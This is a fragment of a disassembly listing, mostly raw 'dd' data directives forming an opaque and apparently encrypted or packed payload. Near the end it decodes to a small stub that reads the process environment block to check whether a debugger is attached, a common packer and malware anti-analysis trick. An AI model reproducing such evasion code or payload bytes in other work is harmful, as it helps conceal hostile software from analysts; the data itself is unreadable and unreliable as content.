dd 4880F870h, 7435E7C2h, 0DEC07885h, 3394AE55h, 8C682CA0h
dd 0FF209811h, 0E8640CCFh, 1760D852h, 48B6D0E5h, 0E8254190h
dd 5C232EC4h, 234D380h, 0DF512AF0h, 64B56746h, 9140F805h
dd 381518D5h, 34150726h, 0A5A058A5h, 1F927CE7h, 0E5B81CBAh
dd 88017C67h, 68133310h, 3B19A85Ah, 0B83088FBh, 58D0A820h
dd 4C35E7C2h, 0C9C07885h, 68E25014h, 0AC7487F0h, 0B0B56718h
dd 9B40F806h, 0DE784DAFh, 0CADDF830h, 16201894h, 0EC14DBAh
dd 7D64D55Bh, 91E378B0h, 0B8200D9Dh, 1943B870h, 6CB22706h
dd 1708F7B0h, 27A01891h, 48C12834h, 52DED8D0h, 8466885h
dd 2C2F982Eh, 0C840B931h, 9D40E6D0h, 3601BE81h, 6FEE51C0h
dd 874B7AC5h, 27E11E16h, 0E251B6DBh, 0FB76C910h, 0FE502DCFh
dd 0D339D810h, 0D705F7B1h, 0A5A01890h, 8DD9A35h, 0E032D0h
dd 880078FCh, 3DDFCB40h, 0C8008E20h, 0E860D46Dh, 0B705F770h
dd 0C1A01890h, 48C03801h, 3AB06651h, 0D0F2EB9h, 0A82098B5h
dd 64487EB3h, 6C6FD56Ch, 880F8E9h, 0DBD538ACh, 47FA041Ch
dd 68E0D455h, 0A80DD5F0h, 9500B830h, 0BC25DF11h, 0D4CCA725h
dd 89FC8D50h, 4080E7EEh, 39B54CC4h, 18E32651h, 0FD2F57CAh
dd 57675E78h, 7271B730h, 0E860FF40h, 0F7D21A87h, 6895A405h
dd 18000BB0h, 80B00880h, 880078F9h, 0C657F754h, 0AC21D75Ch
dd 0C8F52750h, 8D80B846h, 1B966C50h, 245B179h, 39E018E6h
dd 88027898h, 0FE71C990h, 0ECD54760h, 65609866h, 489BFBE5h
dd 0E1934890h, 1A9069E4h, 0FD1F0981h, 88404D9Ch, 57049C97h
dd 887584A5h, 68A32050h, 48958FFDh, 0EB591990h, 1C8677E3h
dd 2DB21987h, 0EB6935ACh, 0C753F762h, 9F1CCC56h, 8704B639h
dd 4BDC8B07h, 4DD26AE5h, 2D964CDEh, 7892BA2h, 0F045249Eh
dd 0DA4FF460h, 9C40CA55h, 8D07AA31h, 7BEFB004h, 28A218E4h
dd 48C0C84Fh, 1A9058D0h, 0E569009Fh, 0CB52F13Eh, 0A92CD957h
dd 984EA128h, 41CEF81Ch, 528053D3h, 30B24CC2h, 629229B3h
dd 0DA452BA5h, 9A10ED30h, 0F9708D00h, 0C640F670h, 42ADC250h
dd 8EE51DFh, 3AA94E96h, 3DEA2DA4h, 88007818h, 45A1C510h
dd 0C800A584h, 0FD175D96h, 0F780F830h, 68958C05h, 5728F9B0h
dd 768A64A4h, 0BD50CD7Bh, 4799850h, 0E235960Ch, 175E5936h
dd 85A38D6Dh, 6896582Dh, 4AB6B3B0h, 0CD86FD87h, 0BB6AFD7Dh
dd 2DAF9850h, 0C8008BA0h, 122651AAh, 0F37EB6FCh, 0E7421921h
dd 0CD4D7B5Bh, 68A04D61h, 0E20012A0h, 0CB5671Eh, 4B40F805h
dd 0EC68FC2Ch, 0C68D305h, 7BA01890h, 0B7C07BF6h, 28D5D045h
dd 744890F0h, 0AFC867EFh, 9B40B830h, 0A73F9B16h, 9D7FF823h
dd 28E02D18h, 0B73C0958h, 9BB6B02Fh, 5FF870Fh, 0A8608B13h
dd 0C840B3D8h, 0AD338D50h, 26B2CB22h, 28EC54D4h, 7D5CAD4Fh
dd 62085890h, 0FF0078F0h, 0C152E863h, 8926CC5Eh, 7D9F8850h
dd 8C0CD38h, 1DF49D19h, 79CF38F0h, 7000D55Dh, 0D8978B0h
dd 0A860AE56h, 54D54761h, 7B609865h, 880FC18h, 0C5159590h
dd 11C078A8h, 5ECCE55Dh, 5EE878B0h, 0CEDF67E6h, 0D5273DF7h
dd 189FD810h, 15E95DF3h, 0A5A018D0h, 8DD1F25h, 2B408D0h
dd 0DA0012F1h, 0A8209A78h, 0F8D547B0h, 6D609866h, 2AF5A2B0h
dd 35FA951Dh, 229238F0h, 0F55D5D6h, 0DC0038EDh, 0F970C846h
dd 0FCD54762h, 0B0609866h, 3EAC6D8Fh, 0AD6618D0h, 488000FDh
dd 68ECB0D0h, 0DB5778F0h, 9B6BDB5Fh, 84049602h, 7D9FD81Ch
dd 8C0CDECh, 28A77003h, 0FD4D38B0h, 68A04094h, 74BDF5A9h
dd 4020D825h, 37BF4E61h, 0E860D4B8h, 46C9AF70h, 7CE556D9h
dd 48C7C9Eh, 0F475A7D0h, 0D0038C5h, 4FA497D0h, 5B40B831h
dd 0E860DD38h, 8A357570h, 71A05888h, 7ED8853Dh, 72085890h
dd 0BFF8706h, 0E81684ADh
dd 4C4FB830h, 0E860D992h, 91014F1h, 40F41890h, 48C039B1h
dd 5D1CCD2Fh, 4C8178B0h, 0A8209980h, 0A2943360h, 7D9F8A50h
dd 8C0CE6Ch, 5DF9D815h, 5B4850BDh, 0FD1F58D0h, 88404D4Ch
dd 15A37AFBh, 0C800A559h, 6549AD50h, 489D95F5h, 0BD5F4890h
dd 48800EB8h, 0ECEF9855h, 880079CBh, 232CD89Bh, 47704730h
dd 0A87DB1D5h, 45053E70h, 29A058A8h, 49AA38DAh, 0FD1F5ABAh
dd 88404EE4h, 0A7DF6093h, 0C841AAB4h, 7DED4B50h, 8C0E515h
dd 7BF208FAh, 7EC4AD4Fh, 0A8655890h, 88F2FDFFh, 15AD9810h
dd 0C800A5B6h, 5488D0E1h, 607F078Ah, 28A01804h, 0C12613EEh
dd 97B47CE4h, 0C835E065h, 3C9D1510h, 7940F82Dh, 12FD3051h
dd 4C0B078Fh, 0C86108B4h, 6C8433B8h, 600099D4h, 80243CFBh
dd 0A8257040h, 0E665B830h, 0BF60A066h, 3DD46D8Fh, 0EC2318D0h
dd 4E87FEBCh, 0E975D5F0h, 0E20038EDh, 0A801F010h, 9B12B830h
dd 0DE704DAFh, 740DF830h, 0D7F70CB4h, 8F56025h, 50E49ED0h
dd 886A38FAh, 5773CF40h, 8876A8A5h, 6586DB50h, 489D5ACDh
dd 40A07290h, 48C038BCh, 0FD1F0B87h, 88404EE0h, 0A820942Dh
dd 450DCD30h, 0A85696E5h, 450D7570h, 3A058A8h, 19C0527Eh
dd 0FD1F0B86h, 88404EFCh, 0D6206093h, 36CB291Fh, 0DE2E6DDDh
dd 530F830h, 38D5B662h, 0B238D0D0h, 1A81A72Fh, 5099BE7h
dd 42CB9967h, 66B77BBh, 0DE2E65DDh, 0AC73F830h, 914BEF17h
dd 4855C7E3h, 0E8E018E6h, 0C8150F4Dh, 82549910h, 0C8358858h
dd 54F52750h, 8880B845h, 6898552Dh, 59B438B0h, 7589DD17h
dd 880078B0h, 2DE69810h, 0C800807Dh, 16363150h, 8D47078Fh
dd 28E00D10h, 0C8C038B0h, 68E49A8Dh, 0A84F72FDh, 0C64FF77Eh
dd 0E826D710h, 8D06B13Ch, 28CFD851h, 4DCD71E4h, 68AF4C90h
dd 0D8C3DB3h, 0FC610A92h, 0A22DB975h, 0E8609810h, 9B409770h
dd 6DED9505h, 49C738E2h, 26A55CC2h, 3AEA55F1h, 0E6651495h
dd 0DB45F464h, 0E839D443h, 9810B938h, 66E1D809h, 50C538F4h
dd 3CA35DC0h, 449436B1h, 0E9740BD0h, 0C649FC7Eh, 0E5608257h
dd 8937D25Dh, 61E89B04h, 49807FFEh, 2CE054DCh, 9C021B1h
dd 0E6201C9Eh, 0DC48FF79h, 0A726981Ch, 9A06F822h, 6CEE9D19h
dd 8E938E3h, 3CA959C7h, 3FEA55EAh, 0ED721D98h, 0CD52F930h
dd 0BD2FC110h, 9A06F87Ch, 6CEE9D19h, 6B8027E3h, 69A555DFh
dd 489411F0h, 0FC200B99h, 8945F579h, 0EF34F110h, 890CF823h
dd 5A19D04h, 0AD2B819Ah, 9CB9D56Bh, 0AF645C9Fh, 2E1451C0h
dd 9F72D000h, 0C33A0C70h, 599A3D55h, 489C1257h, 87C9C7C7h
dd 0F3D326E3h, 9EFF2D3Dh, 11AD3FDFh, 379CF72h, 0A6B9D20Ah
dd 4E74CB30h, 0B033AA60h, 446C4448h, 3B014672h, 9AE835CAh
dd 880078E0h, 0A8209810h, 0C840B830h, 0E860D850h, 880F870h
dd 28A01890h, 48C038B0h, 68E058D0h, 880078F0h, 0A8209810h
dd 0C840B830h, 0E860D850h, 880F870h, 8D237890h, 48800116h
dd 0C245DBD0h, 880038C9h, 0BC632F1Fh, 0C758EBBDh, 0EB6693E7h
dd 2CC473A0h, 24E233B4h, 0AFB21C2h, 0E3F42BD8h, 0CA2B6CB2h
dd 0EB5111Ch, 4140F809h, 0A85972D5h, 8B851370h, 0F1423052h
dd 48C4FAD1h, 4A17DD58h, 0ECE878B0h, 0C0209810h, 0C840B810h
dd 0CA445DDDh, 31D9F830h, 0ABAC6C88h, 0BF223C70h, 516EDD2Fh
dd 7FC378B0h, 5FAD9BC9h, 2B40F812h, 14102740h, 0E003F8FFh
dd 0A156FA94h, 8E21C2Dh, 68DADBD0h, 0BA2B7D84h, 2530EA13h
dd 9318447Eh, 0E85A5B0Eh, 3A7FFC04h, 5A5F1B7Bh, 0B797D0A0h
dd 0A6CBA72Fh, 0B1AAF5DBh, 0AB789850h, 47838C7Bh, 0A8594AD5h
dd 86053F70h, 28A058A9h, 0A0C038B0h, 68E058ECh, 0B18EFD7Bh
dd 0DDC89850h, 20BF47C7h, 0E860D848h, 310E45F3h, 5DA018D0h
dd 0E85DB1B8h, 83E018F2h, 68D876Ch, 6B20D829h, 0F1D23DBFh
dd 7DE9D810h, 8C0C1FEh, 28A01B78h, 8B090BB0h, 6860CB5Bh
dd 605278F0h, 57DF66FDh, 0F1EA2D33h, 3E63D810h, 88C82F3h
dd 29A79C9Fh, 324338B0h, 0ECEF58C0h, 8800780Dh, 0F82CDA9Bh
dd 37BE70D8h, 42E5DBAFh, 0B80B849h, 202A4856h, 3CC0C130h
dd 4619D8C9h, 63407B84h, 0A96813E1h, 179F59B1h, 11E1078Fh
dd 8CCB434h, 3F9F4E5h, 0B239BB78h, 6857D7DFh, 96678F0h
dd 9A136668h, 0C8EB3D3Fh, 6B36D850h, 0DF5F84Ah, 0C3B0521Bh
dd 4BCAB3B2h, 1A080921h, 8BFF870Eh, 0E81932A5h, 8C51530h
dd 6C6F2328h, 880F8F4h, 110AAD6Fh, 0A09038F0h, 971FA685h
dd 0B1AAFDF3h, 2DAF9850h, 0C800819Ah, 0BB44DC53h, 3B8238F3h
dd 2016174Bh, 81402A53h, 4C210BF0h, 94297CD4h, 8C2CB134h
dd 21ABF86Bh, 3F6F23D1h, 36F425CBh, 6D08E311h, 7EB4E3DEh
dd 53B9A351h, 0A6748751h, 8AF66391h, 0EE341485h, 1F323D1h
dd 16F40B28h, 0C1DDE311h, 5EB4CBE8h, 57A6A351h, 867499D5h
dd 97106391h, 0CE345915h, 0D1F24DAFh, 0E1DBF830h, 0D75FE7E1h
dd 5C02BBEEh, 971EB739h, 0E200BB0Fh, 0BDC8C014h, 40BF47C6h
dd 0A84409C5h, 39389E70h, 0E8421A88h, 0AAC23B54h, 6E8AF3B6h
dd 7DFA90A8h, 6AA367EFh, 0A2913F38h, 5888055h, 887F0785h
dd 23D31B6Ah, 0CDC26800h, 68A07C01h, 0E227935Ah, 288AC078h
dd 0D035BBCAh, 2588C9E0h, 0B07F0785h, 28A01891h, 45B4EA34h
dd 0A21EB801h, 8DEB8E1Bh, 0A82098A8h, 77A213B0h, 0D4DD5593h
dd 0FF80B844h, 68942915h, 48C038B0h, 0D8E32C50h, 0DF7D290h
dd 0A860AC21h, 0C940B833h, 0E8965C5Fh, 5D38F870h, 8348F41Bh
dd 0DE7DB11Bh, 0D8E018E9h, 7FABD218h, 0E814A995h, 0C840B830h
dd 72DD5151h, 7C80B849h, 1925EFDBh, 48C07884h, 0D0E258D0h
dd 0BEFF1C97h, 0CF989D65h, 636E3354h, 0E8606036h, 0BF45316h
dd 0DF0A4520h, 8F40935h, 68E058D0h, 0E58DC0F8h, 0BE559818h
dd 0FC713DC7h, 0E860D810h, 8B38FC70h, 5CA01055h, 0A54380B5h
dd 274B5828h, 0BC31FD07h, 0A8239850h, 0CC34B830h, 43CA31E0h
dd 31167DFBh, 0E72B18D0h, 49F09Bh, 5965AF2Ch, 8B0038C4h
dd 0DC209810h, 0AC27006Fh, 55E9EEAFh, 8C0C1EEh, 28A0A03Bh
dd 0F06B5CD7h, 68E07E59h, 76BD905Bh, 889067EFh, 37BC77D8h
dd 8E593BAFh, 6E9507C8h, 0A30B893Bh, 8F40925h, 9F32AFD0h
dd 88007B32h, 4034ED10h, 37BF46A7h, 4188C7E0h, 6E7F078Ch
dd 4EB5E728h, 0C36BA91Bh, 0F665D31Fh, 0A30038C9h, 546811D8h
dd 0FC713DC7h, 0E864D810h, 1AF4F870h, 0D6603128h, 40789378h
dd 0C3E42C10h, 63F80D48h, 2DD73377h, 0C8008C01h, 0E860D858h
dd 0B500B205h, 28E02CBFh, 0F0814CB0h, 0A1C940F9h, 0BC2BDDFAh
dd 4CE09850h, 0E3E5B233h, 43609864h, 822A49C0h, 68943715h
dd 87092B0h, 5CCBDDDAh, 0EEAA78B0h, 5FDD7AA8h, 887489B5h
dd 0E860C850h, 0B8878C70h, 90C6B2D9h, 0E3A6C4C5h, 5B4AB060h
dd 3589D330h, 0A860A192h, 0FC713DC7h, 0E840D810h, 1F5F870h
dd 0ADAA4020h, 48800C99h, 0E9583E7Ah, 0B9858F30h, 0E820D824h
dd 0BC40B830h, 0C0A45853h, 3CA95D7Ah, 83C618D0h, 71468539h
dd 9F4B5890h, 0C8344975h, 0A8209810h, 7849CD70h, 0C1E5DA00h
dd 0A280B844h, 1C919D67h, 484038F0h, 639558D0h, 0D0AC040h
dd 0A860AC3Ah, 0AE7D539Ah, 1F78E9E8h, 48B4C9F5h, 28A11890h
dd 0F8C24CB0h, 424552F9h, 480038C4h, 0D2A9BF4h, 0C8008C1Ah
dd 50067336h, 8D7708F1h, 28E02CA1h, 48C03AB0h, 0A0545AA5h
dd 0BC2ADDFAh, 3469850h
dd 0F1E205B9h, 0D4D8D810h, 0A380F854h, 1C919D67h, 48C838F0h
dd 49458D0h, 0BC31FD07h, 0AC209850h, 0C335B830h, 6D6A60E0h
dd 8C0CC5Bh, 0DFEDF33Ah, 8F40935h, 68E858D0h, 0EE110DF0h
dd 0A2C01BA8h, 88749395h, 0DBCBBE50h, 1D6B52B0h, 3089A0F6h
dd 7CEB9DBAh, 8C205890h, 0A3A572F3h, 0CE20D824h, 0F9C54F9Bh
dd 0E8609864h, 6E80F860h, 5C609928h, 4004B8B3h, 5CCBFDDAh
dd 236678B0h, 87A52E1Fh, 6340F804h, 0DC515DA7h, 880F830h
dd 21D45890h, 0CDC26800h, 68A06CF9h, 0B9858F5Ah, 0A820D824h
dd 7840B810h, 0EC62ADD6h, 0F6CF7574h, 1C89BD1Ah, 0C54938F0h
dd 68A0615Ah, 7480D396h, 1827ED15h, 370F3830h, 6D977210h
dd 8C0CC41h, 28A05890h, 79A680D6h, 41545AA5h, 90B0D396h
dd 9C0B1D1Ah, 2880B870h, 60D07253h, 3CB17D87h, 0A8A018D0h
dd 4AB538B0h, 0CD6ADE60h, 88404CD9h, 54A03376h, 7847CD35h
dd 172F5850h, 8D775230h, 28E02CA1h, 48C138B0h, 285053A5h
dd 0BC29FDFAh, 438A9850h, 4BF8DE3Fh, 0C1C5D290h, 6E80B844h
dd 82A1A83Bh, 7CF1BD47h, 68E05890h, 0A77578F2h, 9C111DE7h
dd 0C840B870h, 0F215D854h, 8D8A38C0h, 28E02CBBh, 7CF09D3Ah
dd 88215890h, 0EEB81EE0h, 0A8903391h, 88F0B0DBh, 0DC4B5D5Ah
dd 0FF2AF830h, 68942915h, 40C038B0h, 0EF02DD0h, 82E8FB48h
dd 0E814B2B5h, 78EBDE30h, 58683351h, 2205F238h, 82A058A4h
dd 7CF1BD47h, 68E05890h, 0FDB178E0h, 1046BD65h, 6D4A40B3h
dd 0E820EC7Ah, 0C8B35316h, 0A21D313Ah, 0BFC07889h, 28D46955h
dd 0A80078F0h, 193FED10h, 0AE5B5347h, 0E278D1E8h, 48B4D2D5h
dd 2B44D890h, 7CEA9DBAh, 0C3865890h, 0B18AC5D9h, 69AA9850h
dd 0F1CA1DBAh, 4306D810h, 8D82A0C0h, 28E02CB9h, 7945CF1Ah
dd 6BE018E4h, 870178F0h, 0A8201F94h, 0AC270030h, 65EBFEDBh
dd 8C0CC41h, 28A0E911h, 89373AB0h, 6BE058D0h, 0EFB87D85h
dd 30E1F74h, 0C840B888h, 9DCBBE50h, 83389E76h, 900B7E75h
dd 4E4F5FD4h, 0E206B7Bh, 0B9858F5Bh, 0A820D824h, 0BD41B830h
dd 0D9E52F10h, 880B844h, 5CA81890h, 0C5785E96h, 5965AFBCh
dd 880038C4h, 0A7229810h, 294A79A5h, 21E47336h, 0B0E6F005h
dd 83C61CB4h, 40702B5Bh, 0EEEB37Ah, 8A5D2048h, 0E814B395h
dd 23EBDE30h, 42A96853h, 3CB17D87h, 28A018D0h, 68B4B8B0h
dd 0EDCA5F60h, 88404CD9h, 0A53A78D1h, 0C864B0B9h, 0DC497D52h
dd 0EC40F830h, 2C649893h, 0E2A1881Bh, 881FE0B6h, 0BC29DDFAh
dd 3469850h, 0FC713DC7h, 0E840D810h, 5BF4F870h, 1C919D67h
dd 48C038F0h, 659478D0h, 8803BF07h, 0AD549810h, 23EA2880h
dd 63A753A3h, 48B97AFDh, 0A1613390h, 1070C4F1h, 5CC9DDDAh
dd 7FAA78B0h, 0E814A995h, 8840B830h, 8E6CAC50h, 243A8C8h
dd 68943115h, 2ECAD3B0h, 6200A768h, 0C8345155h, 5F8BFE10h
dd 887489B5h, 0E860DB50h, 0FFF38C71h, 68942915h, 48C038B0h
dd 9FED2CF0h, 88007B37h, 1825EC10h, 3BAB12A0h, 6DEB17DBh
dd 8C0C1EAh, 6029D0BBh, 0BF090B4Ch, 28D46955h, 80078F0h
dd 252EED10h, 887491B5h, 0A8685250h, 7B8301F0h, 0E5A49568h
dd 48D01CF4h, 0D8E8B811h, 8EE3D37Bh, 68112076h, 70261356h
dd 500858DFh, 0A80F870h, 700B7E71h, 3D09BD1Bh, 59583ED6h
dd 38AB1E30h, 2DAD32D3h, 0C8008C0Ch, 0DC515DA7h, 880F830h
dd 2ED50890h, 103813E7h, 3B6B413Bh, 0A3F853D8h, 0AAD13C0h
dd 0C940F809h, 0A8595AC5h, 83B9F970h, 0A1A43CD4h, 8D0550Dh
dd 0EE5DD3D0h, 0A30038C9h, 0E8191A95h, 0F9C54F30h, 0A8609864h
dd 7C80F870h, 8378EF92h, 1EC03C72h, 0C65DDB87h, 880038C9h
dd 0A9F91C1Fh, 0C5A8B830h, 0A360D850h, 4DCEAA35h, 6922BDCh
dd 488C74F4h, 5D68CD2Fh, 0D8978B0h, 0A860A1AEh, 0F4183363h
dd 9B9F0053h, 3CC37358h, 0D756E478h, 0EE55B34Fh, 33E018E9h
dd 10C3AF3h, 0E8195A95h, 0C002BB30h, 0D1A65DD9h, 7B0BF830h
dd 0A813E7B8h, 0A0C038B0h, 971FAE05h, 0B1A6C57Bh, 40769850h
dd 37BF4EF9h, 0D1C64DDBh, 420BF830h, 24EA1B98h, 0A143F69Bh
dd 86857D5h, 870078F1h, 0A821C294h, 62F5BB30h, 0EB609869h
dd 48B98AC5h, 0C09CB490h, 4862BDBFh, 2E6D58D0h, 0FA8553F4h
dd 0AB20D829h, 4EA8E836h, 6B9F27A6h, 48B95ECDh, 23D51890h
dd 47CC7F8Bh, 68E14353h, 0B10C93F0h, 0E8193E85h, 0C5C5B730h
dd 0EB60D851h, 48B98AF5h, 10217E90h, 0CDCF1D4Fh, 68E0582Ch
dd 0A302387Bh, 4070AC53h, 37BF4E79h, 0D1C66569h, 8D8FF830h
dd 28A01874h, 716ABDB3h, 0EDE35890h, 88404182h, 0EF0B989Bh
dd 5C2B73Ch, 0D360D850h, 8B8FF037h, 28A01854h, 4BC2F833h
dd 0EDE34C97h, 88404182h, 1DDFC842h, 0C800818Eh, 0DD284DAFh
dd 8DDAF830h, 9F251750h, 0A1C038B0h, 68E0584Ch, 0D0F87CCh
dd 0A8209884h, 0C75586B0h, 0E86053D5h, 9C67370h, 78945BBBh
dd 0B735E058h, 0CE5D612Fh, 0FD0038C9h, 2A59B67h, 0CB40F809h
dd 0A859AAD5h, 0C2057170h, 0A3A058A9h, 8A4503B0h, 1AE018E9h
dd 4E8543F8h, 0DA20D829h, 0C8408559h, 0DF12A850h, 880E798h
dd 0D4EE9590h, 4AEBF93Bh, 53F01AD3h, 0C839B275h, 2B2CED10h
dd 0F9BFA8F4h, 0F4449CDFh, 0CB9B1311h, 11329D1Fh, 0C3A038F0h
dd 28D92A65h, 7E7690F0h, 14167EFh, 4840B830h, 0AF4BD625h
dd 33898A7Ch, 0AAAF10D7h, 0B73FC78Ch, 0DA655799h, 3FF870Eh
dd 0FA1BC2Ch, 0C8409C01h, 979F27AFh, 4201C49Bh, 28A078B4h
dd 88F37650h, 0EFC4545Bh, 0C839D675h, 9D991510h, 0CB40B814h
dd 0A859AAD5h, 0AD259E70h, 2B6633DEh, 0AEB2CF2h, 93A69EDCh
dd 0DA81BF18h, 0AD209810h, 4140B830h, 0B63F2416h, 463575B3h
dd 7EA058A8h, 7DBCAD4Fh, 90635890h, 3384770Fh, 21209810h
dd 8879EAB5h, 0BE60B250h, 3D346D8Fh, 0E82518D0h, 4864BCBFh
dd 0A8CB58D0h, 8B6A28A0h, 0C021F240h, 840B830h, 0B4F52706h
dd 8B80B845h, 0ACAFE768h, 48C03D8Eh, 51B6DD59h, 58D78B0h
dd 0A860A14Ah, 0F1222DBDh, 0BA31D810h, 0F7D0F81Ah, 68959C05h
dd 0B738BBB0h, 6DECDCDFh, 886A78F0h, 91762DEFh, 5DBFB870h
dd 0E820EDD0h, 77F00F3h, 28A4ED14h, 2245B1B0h, 5BE018E9h
dd 0D9C37B39h, 0AC4AC940h, 9EF54761h, 17609869h, 48B598E5h
dd 27609D90h, 48C4E934h, 0E1296BD0h, 0C8391675h, 0F971C910h
dd 0C740A758h, 7D9F8850h, 8C0CDD0h, 0ACAFD815h, 48C03C3Ah
dd 5192DD59h, 30C378B0h, 0A820F1DDh, 3F78F3BBh, 0A854E9D5h
dd 880F870h, 2BA66D80h, 8D05535h, 6B326BD0h, 7FF18F31h
dd 0D2A511F1h, 7040F809h, 0E860FC6Bh, 0BBCB3FBh, 68B07515h
dd 4B120BB0h, 9F11AF11h, 0FE85F111h, 6B20D829h, 0CE0B0F3Fh
dd 65553BA9h, 0BF8FE023h, 0F8A30CD3h, 600153F9h, 526188D3h
dd 0E6690FAFh, 2B3DECE9h, 0BA41B44Ah, 0D42B53B0h, 0B94BAFBh
dd 6C2D08D2h, 9137C7F8h, 0EDDB99F3h, 8840419Ah, 8C7413D3h
dd 47808B20h, 0E86060D2h, 0C70B3B70h, 952D137Bh, 488000FEh
dd 5B3FD32Ch, 0E93CD439h, 0D21C9E62h, 0E86CBA47h, 9C3CE4FAh
dd 7CAEC49Ch, 5DA0244Dh, 0C309DB58h, 30A565D1h, 837478B5h
dd 0FA63CB2Dh, 0FBC5B730h, 639F27AFh, 41D7C573h, 0ACAF5BDEh
dd 0B73FC796h, 3DA30FEDh, 938477BEh, 95DF67EFh, 0FA73FB67h
dd 17705C5Fh, 58BD078Fh, 27EF4CC3h, 0B73F3D34h, 803B6B2Fh
dd 77FF86DDh, 56D81C1Fh
dd 1A7347CFh, 0E860CEB8h, 0F7EF1070h, 2848E76Fh, 15C038B0h
dd 476AB551h, 0B5E978B0h, 0CC209813h, 7DCB8ACFh, 0E820E122h
dd 6EA27114h, 72ED2611h, 4BE6BDBFh, 366B58D0h, 0EEDE7BCCh
dd 0ED70A391h, 0CB563D3Fh, 0AB97D850h, 8A0F866h, 21251790h
dd 0BEC038B3h, 0E3E20493h, 0C0F58BEh, 0A8209AECh, 31C1B4D3h
dd 0E860D951h, 0A6E7E7Fh, 0E5481890h, 473FC74Eh, 68E2BB52h
dd 984AF3F0h, 102CD213h, 0C841B830h, 28E3001h, 9DB0078Fh
dd 28E02CBFh, 0FDF01801h, 68A06CE0h, 41FE589Ah, 4034E048h
dd 37BF52E4h, 7C6F0AD5h, 39622BB2h, 68942905h, 2025D3B0h
dd 68E058D6h, 880610A9h, 40789810h, 37BF5284h, 0DC495DDAh
dd 8C06F830h, 689431BAh, 6145B0B0h, 8AE018E4h, 0B9858F10h
dd 0A020D824h, 0BD40B830h, 0C3DD5859h, 980B844h, 0AD57DDE4h
dd 48800C81h, 69E058D3h, 35806384h, 0A860AC39h, 48F0CC35h
dd 0A854F2EDh, 0AFF4FD70h, 1C8BA510h, 3CC538F0h, 5965AF4Eh
dd 880038C4h, 0DCA09810h, 0E1FD3839h, 0EA609864h, 0AD037107h
dd 28E0213Eh, 0BC4FD0B0h, 0A808A72Fh, 60FF870Dh, 0A8209A35h
dd 0F13625BBh, 3688D810h, 77F078Ch, 28A21314h, 3A75B3B0h
dd 0E3E018E9h, 560344AEh, 57DD47F8h, 3DC2B7CFh, 6960D851h
dd 8E0DC3Ah, 0D62BF890h, 32C36EE2h, 789A5BC4h, 0BC31FD07h
dd 0A8209850h, 0C635A830h, 0DC5C6DDDh, 850BF830h, 28E008FDh
dd 0F1979C43h, 68E051DFh, 9800CD7Dh, 0DD39850h, 0CAA3B881h
dd 6D977CA3h, 8C0CC41h, 38A01890h, 4868BCBFh, 1B1F58D0h
dd 796F90D8h, 3DAB67EFh, 0C8008196h, 6C6F0AD5h, 880F8E2h
dd 11D2AD1Bh, 24B38F0h, 4CAAD9C0h, 68007890h, 0DB28D23Bh
dd 0CB898B32h, 655BCC22h, 8C0E81Dh, 38CD951Bh, 1EB238F0h
dd 0EBC4645Bh, 0C8101555h, 0FA39810h, 0C840B85Dh, 0E01A5350h
dd 0B88B271h, 0A3579F67h, 8F9BE35h, 5965AFD0h, 0C80038C4h
dd 0DC209810h, 0CB584F32h, 0D849D422h, 312E4DF9h, 5B2B18D0h
dd 0BFF03998h, 28D46955h, 880038F0h, 5F22EC10h, 7CA8E928h
dd 0B19F27ACh, 7B83F49Bh, 24D233B8h, 0EC336EE1h, 0DD6D018Fh
dd 88404CCCh, 0F67F3CE3h, 45D2893Fh, 0E8610AD7h, 2715C270h
dd 5DA058A4h, 301251B6h, 0E0F26C86h, 44E887A0h, 0F2DF67CFh
dd 0CB4CF2BBh, 6D97C81Ah, 8C0CC41h, 38A01890h, 3DC6793Dh
dd 0C66DD1C3h, 8B0038C9h, 0E830F595h, 0A5E73B30h, 0E860D850h
dd 0F7A8BB5Bh, 68996625h, 1A47B1B0h, 0E7E058D0h, 0DF758B6h
dd 0A860AC21h, 4840B830h, 32DF24h, 0F77F0157h, 862D93CAh
dd 0ABC07889h, 40ABD1D3h, 310327Bh, 0E819EE95h, 0C00A8130h
dd 0A2E9DB23h, 18C2F978h, 28F87B13h, 71BABD3Bh, 54885890h
dd 890078D4h, 0A9799052h, 5DCAE873h, 0E820EC7Fh, 3CB17D87h
dd 28A018D0h, 4EB428B0h, 788DD5D3h, 88B678B0h, 9C111DE7h
dd 0C840B870h, 0FC15D852h, 8D773E8Eh, 28E02CA1h, 48C438B0h
dd 0DD6A5EA5h, 88404CC0h, 9C111DE7h, 8840B870h, 0E315D850h
dd 0CA82FFFAh, 0CA761A3Ah, 0C2C9D347h, 0C2226AD7h, 7FE2AEF2h
dd 23444A23h, 0CACFDC12h, 0BEDD5B08h, 880B849h, 0D3289C9Fh
dd 0FD3FC74Fh, 68A061A2h, 0BDC4ED0Fh, 1DDF9850h, 0C800815Eh
dd 0DD5C4DAFh, 850DF830h, 28E021CAh, 71A2AD3Dh, 3AB15890h
dd 3DFF789Ah, 0A860A146h, 0FDF82DCFh, 5D9FD810h, 8C0C126h
dd 1D9C8D6Fh, 0FD4D38F0h, 68A0609Eh, 0B152CD0Fh, 57769850h
dd 88750CA5h, 0BEC55B50h, 880B849h, 28A0F053h, 229D38B0h
dd 210DD9D1h, 0D00038C3h, 2DE197E0h, 0C800ADB0h, 6BA318D5h
dd 77007B8h, 3D209D51h, 750338F0h, 68CA58C0h, 9666485h
dd 0C42CBC6Ch, 0A853CD41h, 179F1CB8h, 0E0858D8Fh, 0D75FE3EEh
dd 0B73FEA58h, 97CE392Fh, 0BC5600DDh, 0A8052002h, 2020B830h
dd 179F27F5h, 4C0BC105h, 9D2D28B4h, 488000FEh, 0EE8085Bh
dd 8A064271h, 0C076BD63h, 0C8BFB830h, 0E80A1CDBh, 9D7FA822h
dd 28E02D68h, 0C9C8FC33h, 57DF04EEh, 0B030DACh, 83C89CD6h
dd 20BF47CBh, 179F272Fh, 7C383B11h, 0C3A01890h, 48EF8001h
dd 780858D0h, 4A0078F0h, 98989830h, 2040B830h, 0E860D853h
dd 8580DCB2h, 0E5AC3CC4h, 4838BB9Eh, 808041ACh, 880078F0h
dd 9804CC9Bh, 495A336Dh, 0A854CBBDh, 0EDB91070h, 0EAC1E76Fh
dd 4EC138B4h, 6FE55AD3h, 0F10803DBh, 15FF5CB7h, 1001194h
dd 0C3906890h, 0C48BED01h, 5B93D0FFh, 59E8h, 24648B00h
dd 4EBB808h, 0FAEB0000h, 18A16764h, 30408B00h, 240B60Fh
dd 7500F883h, 35h dup(0)
dd 809B4700h, 8308AD7Ch, 9103317Ch, 7Ch, 119h dup(0)
dd 2B000000h, 18F1h dup(0)
db 90h
; ---------------------------------------------------------------------------
call loc_3143102D
; =============== S U B R O U T I N E =======================================
